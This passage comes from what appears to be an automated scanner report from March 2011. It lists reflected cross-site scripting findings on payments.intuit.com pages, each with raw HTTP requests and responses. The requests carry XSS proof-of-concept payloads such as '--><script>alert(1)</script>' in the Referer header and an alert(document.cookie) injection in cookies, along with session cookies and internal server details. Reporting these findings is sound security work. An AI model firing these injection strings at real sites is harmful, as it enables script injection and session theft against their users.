
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=a2606--><script>alert(1)</script>36ea6b49a2c

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:27 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=qJb8zYJPmpX9fWPDb9drlw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:28 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960DDDB0A0805192AA117E34918359D
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=point_002dof_002dsale_002dsolutions_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 150376

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=a2606--><script>alert(1)</script>36ea6b49a2c | -->
...[SNIP]...

1.55. http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 1478c--><script>alert(1)</script>ce81d71fd63 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=1478c--><script>alert(1)</script>ce81d71fd63

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:59 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=Zvyev1DIPRbxZ1pNkQQ+JA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:00 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F84AD0A0805192AA117E37A6A466C
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=process_002dcard_002dpayments_002dfor_002dmac_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 121601

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=1478c--><script>alert(1)</script>ce81d71fd63 | -->
...[SNIP]...

1.56. http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload caed3'-alert(1)-'2634c597979 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=caed3'-alert(1)-'2634c597979

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:46 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=l+8G2jJlBi1HTw87YjT0qA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:47 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F54670A0805192AA117E3EA66DDD4
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=process_002dcard_002dpayments_002dfor_002dmac_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 121568

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=caed3'-alert(1)-'2634c597979';
                   </script>
...[SNIP]...

1.57. http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload ef8c6--><script>alert(1)</script>b4f50ac6cd0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=ef8c6--><script>alert(1)</script>b4f50ac6cd0

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:40 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=bXui4YZA+O-2ZvpBHdsyqQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:41 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F3B280A0805192AA117E302939460
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002donline_002dbilling_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 127127

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=ef8c6--><script>alert(1)</script>b4f50ac6cd0 | -->
...[SNIP]...

1.58. http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86458'-alert(1)-'2f8b7b8371f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=86458'-alert(1)-'2f8b7b8371f

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:26 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=FA-3Ik5F2gUo8heU3wf98g**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:27 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F06D70A0805192AA117E3351F6E5A
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002donline_002dbilling_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 127094

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=86458'-alert(1)-'2f8b7b8371f';
                   </script>
...[SNIP]...

1.59. http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/web-credit-card-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ecbd'-alert(1)-'a54af6c28ec was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/web-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=6ecbd'-alert(1)-'a54af6c28ec

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:57 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=NiG1d4F8Z+SeG-SglGtlog**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:58 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96069050A0805192AA117E328077B90
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=internet_002dmerchant_002daccounts_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116386

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=6ecbd'-alert(1)-'a54af6c28ec';
                   </script>
...[SNIP]...

1.60. http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/web-credit-card-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 38485--><script>alert(1)</script>074023fb5c0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/web-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=38485--><script>alert(1)</script>074023fb5c0

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:13 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=deElcMZz9r2VrFsUqfo9UQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:14 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960A9370A0805192AA117E3EA41B33F
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=internet_002dmerchant_002daccounts_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116418

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=38485--><script>alert(1)</script>074023fb5c0 | -->
...[SNIP]...

1.61. http://payments.intuit.com/support/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /support/

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 8809e--><script>alert(1)</script>275e11ad70b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /support/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
